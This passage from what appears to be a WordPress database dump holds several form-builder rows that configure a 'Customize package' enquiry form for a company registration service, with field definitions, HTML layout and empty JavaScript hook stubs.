Number#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','http://companyregistration.online/wp-content/uploads/2016/03/advance1600.png','fadeInLeft',1),(47,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',7,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','http://companyregistration.online/wp-content/uploads/2016/03/advance1600.png','fadeInLeft',1),(48,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',8,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(49,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(50,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#7#**id**#Radio:#**label**#type_radio#****#6#**id**#Checkbox:#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*7*:*id*:*type_radio*:*type*:*Radio:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*5*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business Registrations***Tax Services***Cloud Applications***Web Design***Online Marketing*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(51,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Business &amp; Tax%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Radio:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business &amp; Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect 